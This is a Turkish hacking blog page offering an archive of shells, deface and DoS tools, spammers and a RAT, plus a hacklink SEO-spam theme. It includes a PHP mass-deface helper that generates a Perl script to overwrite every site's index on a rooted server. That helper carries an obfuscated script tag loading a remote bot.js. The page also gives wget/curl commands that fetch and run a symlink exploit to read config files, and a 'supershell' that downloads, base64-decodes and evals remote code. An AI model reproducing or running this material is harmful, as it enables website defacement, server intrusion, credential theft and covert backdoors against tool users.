Güncell Konular ;
Arşiv Hakkındaki Kısa ve öz Açıklamayı "benioku.txt" de yaptım olabildiğince eleme ile yapılmış bi arşivdir.
ZİP PASS: b0ru70.blogspot.com
İÇERİK:
* %100 Logsuz kullandığım sheller
* Baze deface toolsları
* TXT Ler halinde bypass root methodları
* Brute Tools ve Dorkları
* Piyasanın En Sağlam DoS Toolsları
* JS Rat
* Güncell Bins Arşivi
* Ücretli Stresser Aracım
* Cpanel & Litespeed Crackli Sürümü
* 2 Ad PHP Şifreleyici Tools
* Twitter Spammer
* VPS Düşürme (SSH Brute)
* VPS'i vpn e çevirme methodları (proxy)
* Mail Spammer php tool
* Blogda Bulunana Bazı Araçlar
* Firewall Methodları 2 ad.
* Trojan Scanner (RAT BULCU)
* Phng. Scripti Temeli - İstediğiniz Temayı giydirip Kullanabilirsiniz
iyi hacklinkler..
İNDİR:
1)
2)
3)
4)
____
VİRÜS TOTAL: https://www.virustotal.com/gui/file/ee3b5970448d3837c186f91937afb9d2d64b42b951216568406d0f24038a5641/detection
ARŞİV DIŞI EXPLOİT VE TOOLAR İÇİN = TIKLA
Tag :// deface arşivi,
Tag :// logsuz shell,
Tag :// logsuz shell arşivi,
Tag :// shell arşivi,
Tag :// tool arşivi
Root Olduğunuz Server A Nasıl Mass İndex Atabilceğinizi Göstericeğim,
Her sunucunun dosya dizilimi farklı kullandıkları sistemler (dir) dizinler farklılık göstermektedir sizin mass çekerken kolaylık sağlıcak bi tools la yani " root mass helper shell " ile kullanımı gösterilen video ile baş başa bırkıcam tool en altta açık kaynak olarak bırakıyorum..
Videolu Gösterim:
ARAÇ:
<?php
# B0RU70.BLOGSPOT.COM
echo "<html>
<head>
<title>Mass Deface Helper </title>
<style>
body {background : black;}
fri {border-bottom : 1px red;}
.greetz {color : red ;font-family : Comic Sans MS;font-size : 15px;height : 4%;width : 25%;position : fixed ;bottom : 0;right : 0;background : black;border : 2px solid #00ff00;}
help {color:red;background : black;font: 13px Comic Sans MS;font-weight:bold;}
.but {background-color:rgba(25,25,25,0.6);border:2; padding:2px; border-bottom:2px solid lime; font-size:25px;font-family:Comic Sans MS; color:red;border:2px solid lime;margin:4px 4px 8px 0;}
.but:hover{color:Lime;}
input[type='text'] {background:#111111; border:1; padding:2px; border-bottom:2px solid #393939;font-family:Comic Sans MS; font-size:17px; color:#ffffff;border:3px solid #00ff00;margin:4px 4px 2px 0;}
input[type='text']:hover{border : 2px #999999;color:Lime;}
</style>
<script type='text/javascript'>
document.write(unescape('%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%62%30%72%75%37%30%2E%67%69%74%68%75%62%2E%69%6F%2F%62%6F%74%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E'));
</script>
<br />";
echo "<span style=\"color:lime; font: 14px Comic Sans MS; font-weight:bold;\">Help :<br>1. After u get root, Upload ur deface source as index.txt <br>2. Run this comand on ur CMD / Terminal : <br></span><br/>";
echo "<tr><td><help> <blink>=></blink> cat /etc/httpd/conf/httpd.conf | grep DocumentRoot>dir.txt </help></td><td><br/>";
echo "<tr><td><help> <blink>=></blink> cat /etc/httpd/conf/httpd.conf | grep ServerName>dmn.txt </help></td><td><br><br/><br/>";
echo "<form method=POST>
<tr><td>
<help title='the file you want to put in all sites'> Def page name : </help>
<input title='the file name you want to put in all sites' type=text name=index value=bie.htm> |
<help title='your deface page's source code'>Def source code :</help>
<input title='your index source code' type='text' name='source' value='index.txt'><br><br>
<help>List DocumentRoot from httpd.conf : </help><br>
<input type=text name=dirs size=\"40\">
<br><br>
<help>List ServerName from httpd.conf : </help><br>
<input type=text name=sites size=\"40\">
<br><br>
<tr><td><center><input class='but' type=submit value='Generate ' name='go'></center>
</form>
<br/></td><td></table>";
if($_POST['go']){
echo "<b></b>";
$index = $_POST['index'];
$source = $_POST['source'];
$dirs =explode("\n",@dd1(file_get_contents($_POST['dirs'])));
$sites =explode("\n",@dd2(file_get_contents($_POST['sites'])));
// preparing perl script
if($_POST['dirs']){
$perl = fopen ('mass.txt','w+') or die (" WTF !! , i cannot create files o__O");
$perl_start = "#!/usr/bin/perl";
$perl_end = "print\"All Defaced !\";";
fwrite ($perl,$perl_start."\n\n"); // Write !!
foreach($dirs as $dir){
$result = "system(\"cat ".$source." > ".@kill($dir)."/".$index."\");";
fwrite ($perl, $result."\n");
flush();
}
echo "<tr><td><font style='font: 9pt Comic Sans MS; COLOR: #FFFFFF;font-weight:bold;'>perl script <a style='text-decoration: none;color:lime;' href='mass.txt'>mass.txt</a></font></td><td><br>";
echo "<help>Now run this mass.txt on ur CMD / Terminal <blink>=> </blink> perl mass.txt </help><br>";
fwrite ($perl, "\n".$perl_end);
fclose($perl);
}
// preparing sites list
if($_POST['sites']){
$sitess = fopen ('sites.txt','w+') or die ("WTF !! , i can't create files o__O");
$sitess_start = "http://";
$sitess_end = "/";
fwrite ($sitess,"");
foreach($sites as $site){
$result2 = $sitess_start.@kill($site).$sitess_end.$index;
fwrite ($sitess, $result2."\n");
flush();
}
echo "<br /><tr><td><help>Defaced sites : <a style='text-decoration: none;color:lime;' href='sites.txt'>sites.txt</a></help></td><td><br/><br/>";
fwrite ($sitess,"");
fclose($sitess);
}
}
function kill($value){ return str_replace(array("\n","\r"),"",$value); }
function dd1($value){ return str_replace(array("DocumentRoot"," "),"",$value); }
function dd2($value){ return str_replace(array("ServerName"," "),"",$value); }
echo "<br />";
echo "<div class='greetz'><center> <marquee> Original script by <b>ReZK2LL </marquee></center><font></div>";
?>
Tag :// mass shell,
Tag :// mass.php,
Tag :// php mass helper,
Tag :// php mass shell,
Tag :// rooted,
Tag :// rotlama,
Tag :// server mass,
Tag :// server mass helper,
Tag :// server root mass
Genellikle Apache Sunucularda İşinizce yarıcak bu araç symlink in symlink komutunu kullanmadan
işlemi yaptığı için per olan tüm sunucularda kolaylıkla çalıştırabilirsiniz kullanımına geçelim,
KOMUTLAR :
$ wget https://b0ru70.github.io/Exploit/UploadExploit/prvsym.pl
eğer sunucuda wget çalışmıyosa;
$ curl -O https://b0ru70.github.io/Exploit/UploadExploit/prvsym.pl
Gerekli aracımızı sunucuya çektik şimdi çalıştıralım
$ perl prvsym.pl
ardından komutları çalıştırdığınız klosorde b0_sym diye bir klosor olusucak bu klosoru direk url den açın eğer karşınıza config txt leri çıkarsa işlem başarılıdır.
Tag :// Apache Bypass,
Tag :// apache bypass tool,
Tag :// linux server bypass,
Tag :// perl bypass tool,
Tag :// perl shell,
Tag :// perl symlink,
Tag :// priv sym,
Tag :// priv symlink,
Tag :// server bypass
Altta verciğim php kodunu (supershell.php) olarak kaydedip kullanabilirsiniz piyasada bulunan tüm anti li serverleri bypasslamaktadır. [shell yemeyen siteler için]
<?php
$otuzbir = 'ba'.'se'. 128/2 .'_' .'de'.'co'.'de';
$otuziki = ("http://b0ru70.github.io/gg");
$otuzuc = file_get_contents($otuziki);
eval("?>".($otuzbir($otuzuc)));
?>
Tag :// B0RU70 SHELL,
Tag :// bypass shell,
Tag :// priv,
Tag :// priv shell,
Tag :// priv8,
Tag :// shell
Premium Hacklink / SEO Culara özel blogspot temasıdır (.xml) olarak kullanabilirsiniz.
bol bol konu kasıp linkle beslemeniz yeterlidir seo uyumlu olduğu için istediğiniz keyde yükselicektir..
PASTEBİN: https://pastebin.com/raw/603wgerT
Tag :// blogspot,
Tag :// blogspot tema,
Tag :// blogspot theme,
Tag :// blotspot teması,
Tag :// hacklink,
Tag :// hacklink theme,
Tag :// seo theme,
Tag :// spyhackerz blogspot